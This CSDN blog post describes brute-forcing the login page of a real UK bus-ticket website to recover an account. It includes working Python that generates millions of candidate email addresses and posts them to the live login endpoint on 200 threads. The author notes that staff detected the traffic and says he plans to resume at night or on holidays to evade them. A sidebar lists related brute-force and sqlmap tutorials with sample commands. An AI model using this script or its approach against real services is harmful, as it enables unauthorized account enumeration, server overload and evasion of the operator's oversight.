暴力破解黄巴登录网站

最新推荐文章于 2024-08-23 20:06:11 发布
最新推荐文章于 2024-08-23 20:06:11 发布
阅读量1.7w 收藏 6
点赞数 1
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seamanj/article/details/53811371
版权

在APP上申请了一个黄巴帐号,由于email输错了,导致买了七天的票不能使用,想找回, 公司却说只能找回密码,不能找回帐号,黄巴的网站也像一坨屎,居然email不经过验证直接可以用,导致你输错了都不知道,于是不甘心白白亏掉自己的12镑于是决定,暴力破解之。


先用Python生成帐号字典:


import os
from string import ascii_lowercase

pds=[]


rg=ascii_lowercase
for first in rg:
    for second in rg:
        for third in rg:
            for fourth in rg:
                for fifth in rg:
                    num= "tjiang@b%s%s%s%s%smouth.ac.uk"%(first,second,third,fourth,fifth)
                    pds.append(num)



file_object = open('user.txt', 'w')
file_object.writelines(['%s%s' % (x,'\n') for x in pds])
#file_object.writelines(['%s%s' % (x,os.linesep) for x in pds])
file_object.close( )

然后呢, 用firefox中的httpfox来查看下它的登录封包



然后构造程序模拟登录,暴力破解之


import requests


def Login(user):
   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'********', 'register':'Login Now'})
   if 'Invalid' in r.text:
      isFind = False
   else:
      isFind = True
   return isFind

fpath=r'C:\Users\RaiderJ\Desktop\crack\user.txt'
pfile=open(fpath,'r')
correct_set = set()
for oneUser in pfile.readlines():
    if Login(oneUser):
       print 'success-' + oneUser
       correct_set.add(oneUser)
    else:
       print 'failed-' + oneUser

thefile = open('correct.txt', 'w')
for item in correct_set:
  thefile.write("%s\n" % item)
thefile.close()


好了, 开始遍历了。 不过貌似单线程速度很慢,后面让我们开始多线程,并行破解吧



多线程程序


import threading
import Queue

import requests
mutex = threading.Lock()
#Number of threads
n_thread = 200
#Create queue
queue = Queue.Queue()

def Login(user):
   r = requests.post('https://www.bybus.co.uk/my/login', data={'field[email]': user, 'field[password]':'*******', 'register':'Login Now'})
   if 'Invalid' in r.text:
      isFind = False
   else:
      isFind = True
   return isFind

def WriteOut(user):
   with open(r"C:\Users\seamanj\Desktop\crack\correct.txt", "a") as myfile:
      myfile.write(user)
      myfile.close()
   
   
class ThreadClass(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
    #Assign thread working with queue
        self.queue = queue

    def run(self):
        while True:
        #Get from queue job
            oneUser = self.queue.get()
            print self.getName() + ':get' + str(queue.qsize()) + '\n'
            if Login(oneUser):
               print 'success-' + oneUser + '\n'
               if mutex.acquire():
                  WriteOut(oneUser)
                  mutex.release()
            else:
               print 'failed-' + oneUser + '\n'
            self.queue.task_done()
#Create number process
for i in range(n_thread):
    t = ThreadClass(queue)
    t.setDaemon(True)
    #Start thread
    t.start()

#Read file line by line
hostfile = open("user.txt","r")
for line in hostfile:
    #Put line to queue
    queue.put(line)
    print 'put' + str(queue.qsize()) + '\n'
#wait on the queue until everything has been processed 
queue.join()


不过好像连接太频繁了, 被工作人员发现了尴尬



还是等到夜里, 或者过节的时候再crack吧

seamanj
关注
专栏目录
Pytorch基于深度学习模型Seq2Seq的聊天机器人构建与应用部署实战
Together_CZ的博客
06-08 4051
聊天机器人是非常常见而广泛的应用,很多企业都有很多机器人客服的需求,比如:移动、电信、联通、淘宝、京东等等,聊天机器人的本质就是文本数据处理,我的主要研究方向并不是文本处理相关的,但是断断续续学习、工作中接触到了一定的文本数据处理的任务,对文本数据处理也算得上是有一定的了解程度吧。 聊天机器人的应用可以简单理解为“输入一句话,机器返回一句响应的话”,返回的话跟你的话或者是问题相关度比较高,让你察觉不到是在跟一台机器聊天,这里模型需要能够比较确切地了解或者是解读清楚你输入的文本数据,然...
知乎推荐育儿书籍汇总
jq656021898的博客
02-25 3万+
即将迎接新生命的到来,期待的同时也有很多焦虑,梳理了知乎推荐的育儿书籍,查阅了图书的简介,打算在对应的年龄提前阅读,阅读完以后也会附上阅读感悟,加油,我宝 西尔斯怀孕百科 美国儿科学会育儿百科 实用程序育儿法 婴幼儿睡眠全书 0岁 第一章 初识婴幼儿睡眠... .. 1 一、睡眠问题的影响... .. 2 二、成人的睡眠周期及特点... ... 3 三、婴儿睡眠模式的特点... . 8 四、婴儿睡眠的几个关键点... . 10 五、睡眠驱动力模型... ... 11 六、八大误区破解.....
揭秘破解密码的常见方法和手段
Libra1313的博客
05-06 1万+
Hydra(九头蛇)是THC组织开发的,是一款非常流行的密码破解工具,可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、 SSH、 FTP 等服务,支持 Linux、Windows、 Mac 平台安装,其中 Kali Linux中自带 Hydra。Hashcat 是一款用于破解密码的工具,据说是世界上最快最高级的密码破解工具,支持 LM 哈希、MD5、SHA 等系列的密码破解,同时也支持 Linux、Mac、Windows 平台。在网络上,攻击者可以通过爬虫的方式收集你的有关信息。
Python暴力破解网站登录密码脚本
xff123456_的博客
06-14 1894
测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级关键代码解释url指定url地址 header设置请求头 payload设置请求参数 这一行的作用是做一次get请求,响应信息被变量Response接收 这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解这种方式和burp的Intruder模块的Cluster bomb攻击方式一样 然后把循环结果存放到csv文件里,用逗号分割数据Response.status_code是响应的http状态码,len(Response
黑客 如何攻破一个网站?长文图解全流程,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-23 1046
173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
暴力破解
heiseweiye的博客
09-21 1064
1.暴力破解(御剑,Burp Suit) 1.1题目链接你的网站被黑了 直接上过程,打开网页链接,网页如图: 说网站存在漏洞,没什么头绪,拿去让御剑扫描一下,点击添加选项: 然后将本题链接粘贴上去,点击确定 扫描结果出来两个链接,点击以shell.php链接在此结尾的文件 看一下该链接,页面为一个只需输入密码的登录页面 试了几个密码出不来,那只好拿bp来爆破了,打开bp,在该登录页面随意...
网站暴力破解入门
helloworlddm的博客
02-22 4811
工具 nmap和hydra(Kali Linux自带) nmap 是扫描工具 hydra 暴力破解工具 第一步 扫描 nmap 192.168.1.103 从上图中可以看出ssh是开启的。 第二部 暴力破解 可以使用文件,具体可参考hydra的帮助。 如何生成字典,网上有很多的工具。 hydra -l burning -p 123456 -s 22 192.168.1.103 ssh 如图为破...
Python脚本,网站暴力破解攻击
weixin_44297276的博客
03-28 2083
rv:78.0) Gecko/20100101 Firefox/78.0" # 用户代理。wordlist = "D:\Meu jogos Meus documentos\ProgetoNovo\small.txt" # 字典文件路径。target = input("\nInsira URL:") # 目标URL。# 当单词队列不为空时,获取队列中的单词。# 如果有恢复点,则从恢复点开始。# 遍历字典文件中的每个单词。# 定义函数:读取字典文件。
Burp Suite暴力破解网站密码
m0_53820621的博客
11-22 1万+
一、准备: 1,靶场:个人选择DVWA。 2,工具:Burp Suite。 3,密码字典。 二、开搞!: 注:任何未经授权的渗透测试皆为违法,本文仅供学习,维护网络安全人人有责。 一、打开dvwa暴力破解页面: ...
二百个电影艺术家
热门推荐
jgftyfc的博客
01-31 6万+
二百个电影艺术家
WebShell密码暴力破解
02-08
WebShellWebShell密码暴力破解
黄色宾馆网站建设资源免费
11-13
模板介绍: 黄色宾馆网站模板,风格清晰高雅,适合制作酒店,饭店、宾馆、餐厅等企业网站..... 宽度:1000px 对齐:居中 主色:黄色 结构:div+css 运行环境:asp.net2.0(或以上) 后台地址:pageadmin网站管理系统
黄色宾馆网站制作软件下载
06-01
模板介绍: 黄色宾馆网站模板,风格清晰高雅,适合制作酒店,饭店、宾馆、餐厅等企业网站..... 宽度:1000px 对齐:居中 主色:黄色 结构:div+css 运行环境:asp.net2.0(或以上) 后台地址:pageadmin网站管理系统
高红梅:第四章 第二节 猎捕与欧美文化的身份认同
meimeigao的博客
01-11 788
第二节 猎捕与欧美文化的身份认同 少年的海明威就很向往非洲,到了成年后仍然念念不忘。1926年,海明威在《太阳照样升起》中通过杰克与罗伯特的对话,表达了他想去非洲的渴望。“‘你想过去英国管辖的东非地区打猎吗?'‘没有,我不喜欢。’‘我愿意和你一起去那儿。’”[1]20世纪30年代、50年代海明威先后赴非洲两次,相继创作了长篇小说《非洲的青山》(1935)、《曙光示真》(1949)和短篇小说《一个非洲故事》(1935)、《乞力马扎罗的雪》(1936)、《弗朗西斯•麦康伯短促的幸福生活》(1936)。除.
电影:钢铁侠
m0_61149488的博客
06-16 3096
2008 年的钢铁侠讲述了托尼·斯塔克 (Tony Stark) 的故事,他是一位亿万富翁实业家和天才发明家,他被绑架并被迫制造毁灭性武器。相反,托尼利用他的智慧和聪明才智打造了一套高科技盔甲并逃脱了囚禁。当他发现一个具有全球影响的邪恶阴谋时,他穿上强大的盔甲,发誓要以钢铁侠的身份保护世界。......
网站管理后台帐号密码暴力破解方法
weixin_33699914的博客
09-16 3296
【导读】 对于网站运行的个人站长而言,最担心的是应如何有效且安全的去管理自己的网站,否则自己辛辛苦苦经营的网站就会被不请自来的不速之客给攻破,轻则站点数据被窃取,重则整个网站都被攻陷,导致无法恢复。 本文主要从管理后台这个方面来讲解其××××××过程,并通过在虚拟环境中展开实例演示,各读者可以跟着本教程去做实验,通过实验加强对×××过程的了解,如果你是一名菜鸟站长也可以针对性的去做一下防护方案。 ...
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2380
简单对靶向网站进行暴力破解的简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破解......
黑客是如何一步一步攻破网站的?
weixin_51725318的博客
06-24 526
黑客是如何一步一步攻破网站的?
sqlmap暴力破解
08-26
引用中提到,与暴力破解表名类似,暴力跑的列名可以在txt/common-columns.txt中找到。这个文件包含了一些常见的列名。而引用和引用提到了sqlmap的两个命令,分别是使用--current-db来获取当前数据库的名称,使用--dbs来获取所有的数据库名称。综合这些信息,可以使用sqlmap来进行暴力破解。 使用sqlmap的暴力破解功能,可以帮助我们获取目标数据库的信息。首先,我们需要使用sqlmap的-u参数指定目标链接,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"。然后,使用--current-db命令获取当前数据库的名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db。最后,使用--dbs命令获取所有的数据库名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs。 通过以上步骤,我们可以使用sqlmap来进行暴力破解,获取目标数据库的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqlmap用户手册(七)——爆破等](https://blog.csdn.net/zhaolina004/article/details/14616263)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [实训实训实训](https://blog.csdn.net/IWANnaaa/article/details/123937562)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值